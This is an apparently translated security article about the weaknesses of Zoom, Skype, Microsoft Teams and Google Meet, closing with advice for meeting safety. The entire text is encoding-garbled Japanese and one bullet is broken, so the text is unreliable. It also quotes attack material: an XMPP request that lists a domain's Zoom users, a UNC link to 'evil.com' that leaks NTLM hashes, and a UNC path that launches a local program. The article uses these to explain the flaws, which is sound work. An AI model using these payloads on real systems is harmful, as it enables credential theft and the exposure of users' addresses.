ãããªäŒè°ãæŽçããããã®ãµãŒãã¹ã®åºæ¬çãªèŠä»¶ã¯ãå質ãä¿¡é Œæ§ãã»ãã¥ãªãã£ã§ãããŸããæåã®2ã€ã®èŠä»¶ãåºæ¬çã«ãã¹ãŠã®äž»èŠäŒæ¥ã§åçã§ããå Žåãã»ãã¥ãªãã£ç¶æ³ã¯å€§ããç°ãªããŸãããã®æçš¿ã§ã¯ãZoomãSkypeãMicrosoft TeamsãGoogle Meetãªã©ãæã䜿çšé »åºŠã®é«ããµãŒãã¹ã®æ§åã玹ä»ããŸãã
ãã³ãããã¯ã®çºç以æ¥ããã¹ãŠã®ãããªäŒè°ãµãŒãã¹ã§ãŠãŒã¶ãŒæ°ãççºçã«å¢å ããŠããŸãã
- ããã1ãæã® Skypeã®æ¯æ¥ã®ãŠãŒã¶ãŒæ°ã¯70ïŒ å¢å ããŸããã
- MS TeamsãŠãŒã¶ãŒã®æ°ã¯1æãã5åã«å¢å ãã7500äžäººã«éããŸããã
- 4ãæéã®ZoomãŠãŒã¶ãŒã®æ°ã¯30åã«å¢ãã1æ¥ã«3å人ãè¶ ããŸããã
- 2020幎1æ以éãGoogleïŒãã³ã°ã¢ãŠãïŒMeetã¢ããªã®1æ¥ã®ãŠãŒã¶ãŒæ°ã¯30åã«ãªããçŸåšã¯1å人ã«éããŠããŸã
ãã³ãããã¯ãå§ãŸã£ãŠããã®Zoom Videoã·ã§ã¢ã®äŸ¡å€ã®äžæãåºå žïŒInvesting.com
ãããã倧éã®éèŠã¯äŒæ¥ã®æ ªäŸ¡ã®äžæãåŒãèµ·ãããã ãã§ãªãããµãŒãã¹ã®ã»ãã¥ãªãã£ã«é¢ããåé¡ãæ確ã«ç€ºããŸãããäžéšã®åé¡ã¯ãããã°ã©ããŒã®äœæ¥ã®è³ªã«é¢é£ããŠããããªã¢ãŒãã§ã³ãŒããå®è¡ãããå¯èœæ§ããããŸãããã®ä»ã¯ããµãŒãã¹ã®æªæã®ãã䜿çšã®æ©äŒãæäŸããäžé©åãªã¢ãŒããã¯ãã£äžã®æ±ºå®ã«åºã¥ããŠããŸãã
ãºãŒã
Zoom Videoã¯æåéããã¬ãäŒè°åžå Žã«åå ¥ããããã«ãªãŒããŒã«ãªããŸãããæ®å¿µãªããããªãŒããŒã·ããã¯ãŠãŒã¶ãŒã®æ°ã ãã§ãªããæ€åºããããšã©ãŒã®æ°ã«ãçŸããŸãããå€ãã®åœã®è»ããã³æ¿åºéšéãåé¡ã®ãã補åã®äœ¿çšãåŸæ¥å¡ã«çŠæ¢ããã»ã©ãç¶æ³ã¯æ鬱ã§ããã倧äŒæ¥ãããã«å£ã£ãããããã®æ±ºå®ã«ã€ãªãã£ããºãŒã ã®è匱æ§ãæ€èšããŠãã ããã
æå·åã®åé¡
Zoomã¯ããã¹ãŠã®ãããªé話ãæå·åã«ãã£ãŠä¿è·ãããŠãããšå®£èšããŠããŸãããå®éã«ã¯ãã¹ãŠãããã»ã©çŸããã¯ãããŸããããµãŒãã¹ã¯æå·åã䜿çšããŸãããã¯ã©ã€ã¢ã³ãããã°ã©ã ã¯ãZoomã®ã¯ã©ãŠãã€ã³ãã©ã¹ãã©ã¯ãã£ã®äžéšã§ãããããŒç®¡çã·ã¹ãã ããµãŒããŒã®1ã€ã«ã»ãã·ã§ã³ããŒãèŠæ±ããŸãããããã®ãµãŒããŒã¯æå·åããŒãçæãããããäŒè°ã«åå ããå å ¥è ã«çºè¡ããŸã- ãã¹ãŠã®äŒè°åå è ã«å¯ŸããŠ1ã€ã®ããŒã
ãµãŒããŒããã¯ã©ã€ã¢ã³ããžã®éµã®è»¢éã¯ãhttpsã«ã䜿çšãããTLSãããã³ã«ãä»ããŠè¡ãããŸããäŒè°ã®åå è ã®ãããããèªåã®é»è©±ã§ãºãŒã ã䜿çšããŠããå Žåãæå·åããŒã®ã³ããŒãå¥ã®ãºãŒã ãã¬ãã©ããŒã³ãã¯ã¿ãµãŒããŒã«éä¿¡ãããŸãã
äžéšã®ããŒç®¡çã·ã¹ãã ãµãŒããŒã¯äžåœã«ããããã¹ãŠã®äŒè°åå è ãä»ã®åœã«ããå Žåã§ããããŒã®çºè¡ã«äœ¿çšãããŸããäžåœæ¿åºãæå·åããããã©ãã£ãã¯ãååãããããã€ããŒããèªçºçãã€åŒ·å¶çã«ååŸããããŒã䜿çšããŠããã埩å·åããå¯èœæ§ããããšããããªãã®æãããããŸãã
ãã1ã€ã®æå·åã®åé¡ã¯ããã®å®çšçãªå®è£ ã«é¢é£ããŠããŸãã
- ããã¥ã¡ã³ãã«ã¯256ãããã®AESããŒã䜿çšãããŠãããšèšèŒãããŠããŸãããå®éã®é·ãã¯128ãããã«ãããŸããã
- æå·åã®çµæãå ã®ããŒã¿ã®æ§é ãéšåçã«ä¿æããå ŽåãAESã¢ã«ãŽãªãºã ã¯ECBã¢ãŒãã§åäœããŸãã
ECBã¢ãŒããšä»ã®AESã¢ãŒãã䜿çšããç»åæå·åã®çµæãåºå žïŒWikipedia
$ 500Kã®è匱æ§
2020幎4æäžæ¬ã«ãWindowsããã³macOSã®Zoomã¯ã©ã€ã¢ã³ãã«2ã€ã®ãŒããã€è匱æ§ãçºèŠãããŸããã Windowsã¯ã©ã€ã¢ã³ãã®RCEã®è匱æ§ã¯ããã«50äžç±³ãã«ã§å£²ãã«åºãããŸããããšã©ãŒãå©çšããã«ã¯ãæ»æè ã¯è¢«å®³è ãåŒã³åºããã被害è ãšåãäŒè°ã«åå ããå¿ èŠããããŸãã
macOSã¯ã©ã€ã¢ã³ãã®è匱æ§ã¯ãã®ãããªæ©èœãæäŸããªãã£ãã®ã§ãå®éã®æ»æã§ã®äœ¿çšã¯ã»ãšãã©ãããŸããã
äžæ£ãªXMPPãªã¯ãšã¹ããžã®å¯Ÿå¿
2020幎4æã®çµããã«ãZoomã¯å¥ã®è匱æ§ãçºèŠããŸãããç¹å¥ã«çŽ°å·¥ãããXMPPãªã¯ãšã¹ãã䜿çšããããšã§ãã誰ã§ããä»»æã®ãã¡ã€ã³ã«å±ãããã¹ãŠã®ãµãŒãã¹ãŠãŒã¶ãŒã®ãªã¹ããååŸã§ããŸããããšãã°ã次ã®åœ¢åŒã®XMPPãªã¯ãšã¹ããéä¿¡ããŠãusa.govãã¡ã€ã³ãããŠãŒã¶ãŒã¢ãã¬ã¹ã®ãªã¹ããååŸã§ããŸãã
<iq id='{XXXX}' type='get'
from='any_username@xmpp.zoom.us/ZoomChat_pc' xmlns='jabber:client'>
<query xmlns='zoom:iq:group' chunk='1' directory='1'>
<group id='usa.gov' version='0' option='0'/>
</query>
</iq>
ã¢ããªã¯åã«ã¢ãã¬ã¹äžèŠ§ãèŠæ±ããŠãããŠãŒã¶ãŒã®ãã¡ã€ã³ããã§ãã¯ããŸããã§ããã
macOSã®å¶åŸ¡ã®ååŸæ»æè ãããã€ã¹ãå¶åŸ¡ã§ãã2ã€ã®è匱æ§
ãmacOSã®Zoomã¯ã©ã€ã¢ã³ãã«çºèŠãããŸããã
- Zoomã€ã³ã¹ããŒã©ãŒã¯ããã«ãŠã§ã¢ããŠãŒã¶ãŒã®ä»å ¥ãªãã«èªåèªèº«ãã€ã³ã¹ããŒã«ããããã«ãã䜿çšããã·ã£ããŠã€ã³ã¹ããŒã«ææ³ã䜿çšããŸãããããŒã«ã«ã®æš©éã®ãªãæ»æè ããZoomã€ã³ã¹ããŒã©ã«æªæã®ããã³ãŒããæ¿å ¥ããã«ãŒãæš©éãååŸããå¯èœæ§ããããŸãã
- Zoom-, , . .
Windowsã¯ã©ã€ã¢ã³ãã®UNCã®è匱æ§Windows
ã®ãºãŒã ã¯ã©ã€ã¢ã³ãã«çºèŠãããè匱æ§ã«ãããUNCãªã³ã¯ãä»ãããŠãŒã¶ãŒè³æ Œæ å ±ã®æŒæŽ©ã«ã€ãªããå¯èœæ§ããããŸãããã®çç±ã¯ãZoom Windowsã¯ã©ã€ã¢ã³ãããªã³ã¯ãUNCãã¹ã«å€æããããã\\ evil.com \ img \ kotik.jpgã®ãããªãªã³ã¯ããã£ããã«éä¿¡ãããšãWindowsã¯SMBãããã³ã«ã䜿çšããŠãã®ãµã€ãã«æ¥ç¶ãããã¡ã€ã«ãéãããšããŸãkotik.jpgããªã¢ãŒããµã€ãã¯ãããŒã«ã«ã³ã³ãã¥ãŒã¿ãŒãããŠãŒã¶ãŒåãšNTLMããã·ã¥ãåãåããŸããããã¯ãHashcatãŸãã¯ä»ã®ããŒã«ã䜿çšããŠè§£èªã§ããŸãã
ãã®ææ³ã䜿çšãããšãããŒã«ã«ã³ã³ãã¥ãŒã¿äžã§ã»ãšãã©ãã¹ãŠã®ããã°ã©ã ãå®è¡ããããšãã§ããŸãããããšãã°ããªã³ã¯\ 127.0.0.1 \ C $ \ windows \ system32 \ calc.exeã¯é»åãèµ·åããŸãã
ãããªé話ã®é²é³ãªãŒã¯
4æåæ¬ãZoomãŠãŒã¶ãŒããã®å人çãªãããªé話ã®é²ç»ãYouTubeãšVimeoã«ç»å ŽããŸãããããã«ã¯ãåŠæ ¡ã®ã¬ãã¹ã³ãå¿ççæ³ã®ã»ãã·ã§ã³ãå»åž«ã®èšºå¯ãäŒæ¥ã®äŒè°ãªã©ãå«ãŸããŸãã
ãªãŒã¯ã®çç±ã¯ããµãŒãã¹ããããªäŒè°ã«ãªãŒãã³èå¥åãå²ãåœãŠãäŒè°ã®äž»å¬è ãããããžã®ã¢ã¯ã»ã¹ããã¹ã¯ãŒãã§ä¿è·ããªãã£ãããã§ãã誰ã§ãã¬ã³ãŒãããããŒãžãããŠããã®è£éã§ãããã䜿çšããããšãã§ããŸãã
çæ
ããã¯ãããã©ã«ãã®äŒè°ã»ãã¥ãªãã£èšå®ã«ååãªæ³šæãæããªããšãæ²æšãªçµæãæããŸãã«ãã®å Žåã§ãã Zoomã§ãããªäŒè°ã«æ¥ç¶ããã«ã¯ãäŒè°IDãç¥ã£ãŠããã°ååã§ãããããè ããããäžæã«äœ¿çšãå§ããŸããã圌ãã¯ãªã³ã©ã€ã³ã¬ãã¹ã³ã«å²ã蟌ãã§ãããã§äžçš®ã®ãæ©ç¥ããç·Žç¿ããŸãããããšãã°ããã«ããããªã§ç»é¢ã®ãã¢ãéå§ãããããããã€ãªç»åã§æåž«ã®ç»é¢ã«ããã¥ã¡ã³ããæãããããŸããã
次ã«ãåé¡ã¯ãªã³ã©ã€ã³ã¬ãã¹ã³ãäžæããã ãã§ã¯ãªããšããããšãå€æããŸããã New York Timesã®èšè ã¯ãRedditãš4Chanã®ãã©ãŒã©ã ã§ã¯ããŒãºããã£ãããšã¹ã¬ãããçºèŠããŸããããã©ãŒã©ã ã®ã¡ã³ããŒã¯ãå ¬éã€ãã³ãã劚害ããããã«å€§èŠæš¡ãªãã£ã³ããŒã³ãå®æœããŸãããã¢ã«ã³ãŒã«äŸåçå¿åãªã³ã©ã€ã³äŒè°ãããã³ãã®ä»ã®ãºãŒã äŒè°ã圌ãã¯å ¬éãããŠãããã°ã€ã³è³æ Œæ å ±ãæ€çŽ¢ããä»ã®ãããŒã«ãã楜ãã¿ãã«æåŸ ããŸããã
ãã°ä¿®æ£
ãµãŒãã¹ã®å€§å¹ ãªæåŠã«ãããZoomã®ç®¡çè ã¯ç·æ¥ã®è¡åããšãå¿ èŠããããŸããã4æåæ¬ã®CNNãžã®ã€ã³ã¿ãã¥ãŒã§ãZoomã®CEOã§ããEric Yuanã¯äŒç€Ÿã®åããéããããããããã€ãã®ãã¹ãç¯ãããšè¿°ã¹ãŸããã圌ãã®æèšãåŠãã§ã圌ãã¯ãã©ã€ãã·ãŒãšã»ãã¥ãªãã£ã«çŠç¹ãåãããããã«äžæ©æ»ã£ãã90æ¥éã®ã»ãã¥ãªãã£ããã°ã©ã
ã«åŸã£ãŠããºãŒã ã¯2020幎4æ1æ¥ä»¥éãæ°æ©èœã®éçºãäžæ¢ããç¹å®ãããåé¡ã®ä¿®æ£ãšã³ãŒãã®ã»ãã¥ãªãã£ã®ç£æ»ãéå§ããŸããã
ãããã®å¯Ÿçã®çµæãZoomããŒãžã§ã³5.0ããªãªãŒã¹ãããç¹ã«AESæå·åã256ãããã«ã¢ããã°ã¬ãŒããããã»ãã¥ãªãã£ã«é¢é£ããä»ã®å€ãã®æ¹åãããã©ã«ãã§å®è£ ãããŸããã
ã¹ã«ã€ã
ãŠãŒã¶ãŒæ°ã®æ¥å¢ã«ãããããããSkypeã¯ä»å¹Žã®æ å ±ã»ãã¥ãªãã£ãã¥ãŒã¹ã«äžåºŠã ãç»å Žããããã§ãè匱æ§ãšã®é¢é£ã¯ãããŸããã 2020幎1æã«ãå è«è² æ¥è ã¯The Guardianã«ãMicrosoftãäœå¹Žãã®éã»ãã¥ãªãã£å¯Ÿçãªãã§SkypeãšCortanaãŠãŒã¶ãŒã®å£°ãèããŠåŠçããŠãããšèªã£ãããã ããããã¯2019幎8æã«åããŠç¥ãããããã«ãªããMicrosoftã®æ åœè ã¯ãé³å£°ããŒã¿ã®åéã¯ãé³å£°ã³ãã³ãã®æ€çŽ¢ãšèªèãé³å£°ç¿»èš³ãæåèµ·ãããªã©ã®é³å£°ãµãŒãã¹ã®éçšãä¿èšŒããã³æ¹åããããã«è¡ããããšèª¬æããŸããã
ã¯ãšãªãSkypeãã®è匱æ§ã®ããŒã¿ããŒã¹ã®æ€çŽ¢çµæããœãŒã¹ïŒcve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype
è匱æ§ã«ã€ããŠã¯ãCVEããŒã¿ããŒã¹ã«ãããšã 2020幎ã®Skypeã«è匱æ§ã¯èŠã€ãããŸããã§ããã
MSããŒã
Microsoftã¯ãMS Teamsãå«ãèªç€Ÿè£œåã®ã»ãã¥ãªãã£ã«å€ãã®æ³šæãæã£ãŠããŸãïŒå察ã®æèŠãåºãŸã£ãŠããŸããïŒã2019-2020幎ã«ãããŒã ã§æ¬¡ã®è匱æ§ãçºèŠããã³ä¿®æ£ãããŸããïŒ
1. CVE-2019-5922 -Teamsã€ã³ã¹ããŒã©ãŒã®è匱æ§ãããã«ãããæ»æè ã¯æªæã®ããDLLãã¹ãªããããã¿ãŒã²ããã·ã¹ãã ã§æš©éãååŸããããšãã§ããŸããã圌ã®ãã©ã«ãã«ã
2. Microsoft Teamsãã©ãããã©ãŒã ã®è匱æ§ã«ãããç»åã䜿çšããŠãŠãŒã¶ãŒã¢ã«ãŠã³ãã䟵害ãããå¯èœæ§ããããŸãã
ç»åã䜿çšããMSããŒã ãžã®æ»æã®ã¹ããŒã ãåºå žïŒwww.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams
åé¡ã®åå ã¯ãTeamsãç»åã¢ã¯ã»ã¹ããŒã¯ã³ãåŠçããæ¹æ³ã«ãããŸããããã©ãããã©ãŒã ã¯ãauthtokenãšskypetokenã®2ã€ã®ããŒã¯ã³ã䜿çšããŠãŠãŒã¶ãŒãèªèšŒããŸããAuthtokenã䜿çšãããšããŠãŒã¶ãŒã¯Teamsãã¡ã€ã³ãšSkypeãã¡ã€ã³ã«ç»åãã¢ããããŒãããã¡ãã»ãŒãžã®èªã¿åããéä¿¡ãªã©ãã¯ã©ã€ã¢ã³ãããã®ã³ãã³ããåŠçãããµãŒããŒã«å¯ŸããŠèªèšŒããããã«äœ¿çšãããskypetokenãçæã§ããŸãã
äž¡æ¹ã®ããŒã¯ã³ãååããæ»æè ã¯ãTeams APIåŒã³åºããè¡ããã¢ã«ãŠã³ããå®å šã«å¶åŸ¡ã§ããŸãã
- ã¡ãã»ãŒãžã®èªã¿åããšéä¿¡ã
- ã°ã«ãŒããäœæãã
- ãŠãŒã¶ãŒã®è¿œå ãšåé€ã
- æš©éãå€æŽããŸãã
ååããã«ã¯ãæ»æè ãGIFãã¡ã€ã«ã䜿çšããŠå¶åŸ¡ããteams.microsoft.comãã¡ã€ã³ã®ãµããã¡ã€ã³ã«è¢«å®³è ãèªå°ããã ãã§ååã§ããã次ã«ã被害è ã®ãã©ãŠã¶ã¯ããã«ãŒã«authtokenãéä¿¡ããããã«ãŒã¯ã¹ã«ã€ãããŒã¯ã³ãäœæã§ããããã«ãªããŸãã
3. Tenableã®ç 究è ãPraise Cardsã³ã³ããŒãã³ããšãã£ãããŠã£ã³ããŠã§çºèŠããããã€ãã®è匱æ§ã«ãããèšå®ãžã®äžæ£ãªå€æŽã«ã³ãŒããæ¿å ¥ãããããŠãŒã¶ãŒã®è³æ Œæ å ±ãçãã ãããããšãã§ããŸããããã€ã¯ããœããã¯ãããã®åé¡ã«å¯Ÿããåå¥ã®æšå¥šããªãªãŒã¹ããŠããŸããããæ°ããããŒãžã§ã³ã®ã¢ããªã§ä¿®æ£ããŠããŸãã
ã°ãŒã°ã«ããŒã
åæ§ã®ãµãŒãã¹ãšã¯ç°ãªããGoogle Meetã¯å®å šã«ãã©ãŠã¶ã§åäœããŸãããã®æ©èœã®ãããã§ãéå»2幎éãGoogleã®ãããªäŒè°ãæ å ±ã»ãã¥ãªãã£ãã¥ãŒã¹ã«æ²èŒãããããšã¯ãããŸããã§ããããã³ãããã¯ã«ãããŠãŒã¶ãŒæ°ã®30åã®å¢å ã§ãããã»ãã¥ãªãã£ã«åœ±é¿ãäžããè匱æ§ã¯æããã«ãªããŸããã§ããã
ç§ãã¡ã®æšå¥šäºé
ãœãããŠã§ã¢ã䜿çšããã«ã¯ãå®å šã«å¯Ÿãã責任ããæ 床ãå¿ èŠã§ãããããªäŒè°ããŒã«ãäŸå€ã§ã¯ãããŸããããªã³ã©ã€ã³äŒè°ãä¿è·ããããã®ã¬ã€ãã©ã€ã³ã¯æ¬¡ã®ãšããã§ãã
- ææ°ã®ãœãããŠã§ã¢ããŒãžã§ã³ã䜿çšãã
- å ¬åŒãªãœãŒã¹ããã®ã¿ãœãããŠã§ã¢ã€ã³ã¹ããŒã©ãŒãããŠã³ããŒããã
- ã€ã³ã¿ãŒãããã§äŒè°IDãå ¬éããªãã§ãã ããã
- äºèŠçŽ èªèšŒã§ã¢ã«ãŠã³ããä¿è·ãã
- æ¿èªããããŠãŒã¶ãŒã®ã¿ã«äŒè°ãžã®æ¥ç¶ãèš±å¯ããŸãã
- ã€ãã³ãã®éå§åŸã«æ°ããæ¥ç¶ã®å¯èœæ§ãéãã
- äž»å¬è ãäŒè°ã®åå è ããããã¯ãŸãã¯åé€ã§ããããã«ããŸãã
- æ°ããæ¢ç¥ã®è åšã«å¯Ÿããå æ¬çãªä¿è·ãæäŸããææ°ã®ãŠã€ã«ã¹å¯Ÿçãœãªã¥ãŒã·ã§ã³ã䜿çšããŸãã
ãããªäŒè°ã®ãªã³ã©ã€ã³è¡çã®ã«ãŒã«ãéµå®ããããšã§ãæãå°é£ãªææã§ãå¹ççãã€å®å šã«äœæ¥ã§ããŸãã